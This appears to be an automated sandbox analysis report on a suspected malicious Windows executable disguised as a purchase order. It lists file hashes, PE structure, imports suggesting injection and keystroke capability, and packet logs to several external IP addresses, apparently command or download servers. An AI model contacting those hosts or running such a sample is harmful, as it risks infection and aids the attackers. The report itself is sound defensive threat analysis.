                                                                                                            SSDEEP:6144:qPzGFGUOzmxydzSAJlBPU2uT3vfvg1q+1iHvLIpl+0wrjn3E4znvpy4YP:4zPRvl+53vfvOj1mmxwrjU2Q4YP
                                                                                                            MD5:CDE3AD910A5684A6EAE97197BAF8B616
                                                                                                            SHA1:51BBAC28152851B33722A5260828760CBBE9EF95
                                                                                                            SHA-256:A517840B37FF33BBAA138F6BCED89803A27750CE79B610DD6057E07122FD86AA
                                                                                                            SHA-512:0F925A9EFE6D28B5CC8FB9872E84D3573CFAA0442CCB2BB260F90C9AEDCA889768751F43C9287028DA18A067D1AC17232025184138ED6B2D7A68B1D44A96085C
                                                                                                            Malicious:false
                                                                                                            Preview:...A@MSJPEUB..B3.F17QRYY.ACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3.F17_M.WI.J.r.U..c.Y+@a6CX6 84i""#=% e7'lC7]a/_....y$.'(}GYOqBL1B3AFH6X.d9..~-4.i%2.V...{&V.K..u!$.I...i"+..Z"..W6.YYIACMSJ..UB.0C3F..nQRYYIACM.JVD^CG1BeEF17QRYYIA.^SJTUUBLAF3AFq7QBYYICCMUJTEUBL1D3AF17QRY)MACOSJTEUBN1..AF!7QBYYIASMSZTEUBL1R3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1lG$>E7QR..MAC]SJT.QBL!B3AF17QRYYIACMsJT%UBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTEUBL1B3AF17QRYYIACMSJTE

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):7.149000818737427
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:PO #2411071822.exe
                                                                                                            File size:1'213'440 bytes
                                                                                                            MD5:564780e97b7357ca98fc62db3df63809
                                                                                                            SHA1:cf356f775304d3bb066be358353ff1cc96689fd2
                                                                                                            SHA256:14bc9f9cd6cfa43bf361789b26b16a95e6867c8bbd5bd78670b19da25bc729ef
                                                                                                            SHA512:3481c15ad0f18a2b7a3cfb65429c81cb0da0550668ba82d51f947d64954640b4086245c2fc828d2458fa9bcee66d19d4de7a63caa7237051321a1354bc657745
                                                                                                            SSDEEP:24576:Ctb20pkaCqT5TBWgNQ7aSDV7xYNovcZ6A:PVg5tQ7aSD+ovw5
                                                                                                            TLSH:F945D01273DD8361C7B25273BA267701BEBF782506A1F56B2FD8093DE920162521EB73
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                                            File Icon

                                                                                                            Icon Hash:aaf3e3e3938382a0

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x425f74
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x673FC0C8 [Thu Nov 21 23:22:48 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:5
                                                                                                            OS Version Minor:1
                                                                                                            File Version Major:5
                                                                                                            File Version Minor:1
                                                                                                            Subsystem Version Major:5
                                                                                                            Subsystem Version Minor:1
                                                                                                            Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            call 00007F3244DB67EFh
                                                                                                            jmp 00007F3244DA9804h
                                                                                                            int3
                                                                                                            int3
                                                                                                            push edi
                                                                                                            push esi
                                                                                                            mov esi, dword ptr [esp+10h]
                                                                                                            mov ecx, dword ptr [esp+14h]
                                                                                                            mov edi, dword ptr [esp+0Ch]
                                                                                                            mov eax, ecx
                                                                                                            mov edx, ecx
                                                                                                            add eax, esi
                                                                                                            cmp edi, esi
                                                                                                            jbe 00007F3244DA998Ah
                                                                                                            cmp edi, eax
                                                                                                            jc 00007F3244DA9CEEh
                                                                                                            bt dword ptr [004C0158h], 01h
                                                                                                            jnc 00007F3244DA9989h
                                                                                                            rep movsb
                                                                                                            jmp 00007F3244DA9C9Ch
                                                                                                            cmp ecx, 00000080h
                                                                                                            jc 00007F3244DA9B54h
                                                                                                            mov eax, edi
                                                                                                            xor eax, esi
                                                                                                            test eax, 0000000Fh
                                                                                                            jne 00007F3244DA9990h
                                                                                                            bt dword ptr [004BA370h], 01h
                                                                                                            jc 00007F3244DA9E60h
                                                                                                            bt dword ptr [004C0158h], 00000000h
                                                                                                            jnc 00007F3244DA9B2Dh
                                                                                                            test edi, 00000003h
                                                                                                            jne 00007F3244DA9B3Eh
                                                                                                            test esi, 00000003h
                                                                                                            jne 00007F3244DA9B1Dh
                                                                                                            bt edi, 02h
                                                                                                            jnc 00007F3244DA998Fh
                                                                                                            mov eax, dword ptr [esi]
                                                                                                            sub ecx, 04h
                                                                                                            lea esi, dword ptr [esi+04h]
                                                                                                            mov dword ptr [edi], eax
                                                                                                            lea edi, dword ptr [edi+04h]
                                                                                                            bt edi, 03h
                                                                                                            jnc 00007F3244DA9993h
                                                                                                            movq xmm1, qword ptr [esi]
                                                                                                            sub ecx, 08h
                                                                                                            lea esi, dword ptr [esi+08h]
                                                                                                            movq qword ptr [edi], xmm1
                                                                                                            lea edi, dword ptr [edi+08h]
                                                                                                            test esi, 00000007h
                                                                                                            je 00007F3244DA99E5h
                                                                                                            bt esi, 03h
                                                                                                            jnc 00007F3244DA9A38h
                                                                                                            movdqa xmm1, dqword ptr [esi+00h]

                                                                                                            Rich Headers

                                                                                                            Programming Language:
                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                            • [ASM] VS2012 UPD4 build 61030
                                                                                                            • [RES] VS2012 UPD4 build 61030
                                                                                                            • [LNK] VS2012 UPD4 build 61030

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f2e0.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0xc40000x5f2e00x5f400fc7d0251f6a2ef647ac94ea741978cebFalse0.9327248400590551data7.9067490435877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0xc44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                            RT_ICON0xc45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                            RT_ICON0xc48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                            RT_ICON0xc49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                            RT_ICON0xc58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                            RT_ICON0xc61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                            RT_ICON0xc66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                            RT_ICON0xc8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                            RT_ICON0xc9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                            RT_STRING0xca1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                                            RT_STRING0xca6dc0x68adataEnglishGreat Britain0.2747909199522103
                                                                                                            RT_STRING0xcad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                                            RT_STRING0xcb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                            RT_STRING0xcb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                            RT_STRING0xcbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                                            RT_STRING0xcc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                            RT_RCDATA0xcc4100x569b7data1.0003269972909965
                                                                                                            RT_GROUP_ICON0x122dc80x76dataEnglishGreat Britain0.6610169491525424
                                                                                                            RT_GROUP_ICON0x122e400x14dataEnglishGreat Britain1.15
                                                                                                            RT_VERSION0x122e540xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                            RT_MANIFEST0x122f300x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                                            VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                            COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                            USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                            UxTheme.dllIsThemeActive
                                                                                                            KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                                            USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                                            GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                            ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                            OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                                            Possible Origin

                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishGreat Britain

                                                                                                            Network Behavior

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 22, 2024 07:55:10.504558086 CET4972680192.168.2.5103.21.221.87
                                                                                                            Nov 22, 2024 07:55:10.624218941 CET8049726103.21.221.87192.168.2.5
                                                                                                            Nov 22, 2024 07:55:10.624332905 CET4972680192.168.2.5103.21.221.87
                                                                                                            Nov 22, 2024 07:55:10.634231091 CET4972680192.168.2.5103.21.221.87
                                                                                                            Nov 22, 2024 07:55:10.753832102 CET8049726103.21.221.87192.168.2.5
                                                                                                            Nov 22, 2024 07:55:12.263582945 CET8049726103.21.221.87192.168.2.5
                                                                                                            Nov 22, 2024 07:55:12.263644934 CET8049726103.21.221.87192.168.2.5
                                                                                                            Nov 22, 2024 07:55:12.263806105 CET4972680192.168.2.5103.21.221.87
                                                                                                            Nov 22, 2024 07:55:12.266982079 CET4972680192.168.2.5103.21.221.87
                                                                                                            Nov 22, 2024 07:55:12.386563063 CET8049726103.21.221.87192.168.2.5
                                                                                                            Nov 22, 2024 07:55:28.235346079 CET4976780192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:28.355248928 CET804976738.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:28.355410099 CET4976780192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:28.371376991 CET4976780192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:28.491144896 CET804976738.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:29.887609959 CET4976780192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:29.912131071 CET804976738.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:29.912403107 CET4976780192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:29.912529945 CET804976738.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:29.912600040 CET4976780192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:30.032370090 CET804976738.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:30.032435894 CET4976780192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:30.907510996 CET4977380192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:31.027338982 CET804977338.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:31.027425051 CET4977380192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:31.045470953 CET4977380192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:31.165142059 CET804977338.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:32.559494972 CET4977380192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:32.611973047 CET804977338.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:32.612107038 CET4977380192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:32.612181902 CET804977338.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:32.612236023 CET4977380192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:32.679163933 CET804977338.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:32.679291964 CET4977380192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:32.966419935 CET804977338.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:32.966548920 CET4977380192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:33.577636957 CET4977980192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:33.698503971 CET804977938.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:33.698652983 CET4977980192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:33.712275028 CET4977980192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:33.831978083 CET804977938.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:33.832233906 CET804977938.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:35.215884924 CET4977980192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:35.336091995 CET804977938.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:35.336328983 CET4977980192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:36.234705925 CET4978680192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:36.354542971 CET804978638.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:36.354784012 CET4978680192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:36.363432884 CET4978680192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:36.484565973 CET804978638.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:37.999794960 CET804978638.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:37.999921083 CET804978638.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:37.999998093 CET4978680192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:38.002803087 CET4978680192.168.2.538.47.232.124
                                                                                                            Nov 22, 2024 07:55:38.122700930 CET804978638.47.232.124192.168.2.5
                                                                                                            Nov 22, 2024 07:55:43.788465977 CET4980680192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:43.908164978 CET8049806199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:43.908454895 CET4980680192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:43.927213907 CET4980680192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:44.046974897 CET8049806199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:45.004997015 CET8049806199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:45.005063057 CET8049806199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:45.005135059 CET4980680192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:45.005211115 CET8049806199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:45.005281925 CET4980680192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:45.434645891 CET4980680192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:46.631449938 CET4981180192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:46.751046896 CET8049811199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:46.751333952 CET4981180192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:46.801234007 CET4981180192.168.2.5199.59.243.227
                                                                                                            Nov 22, 2024 07:55:46.920980930 CET8049811199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:47.945991993 CET8049811199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:47.946059942 CET8049811199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:47.946114063 CET8049811199.59.243.227192.168.2.5
                                                                                                            Nov 22, 2024 07:55:47.946255922 CET4981180192.168.2.5199.59.243.227
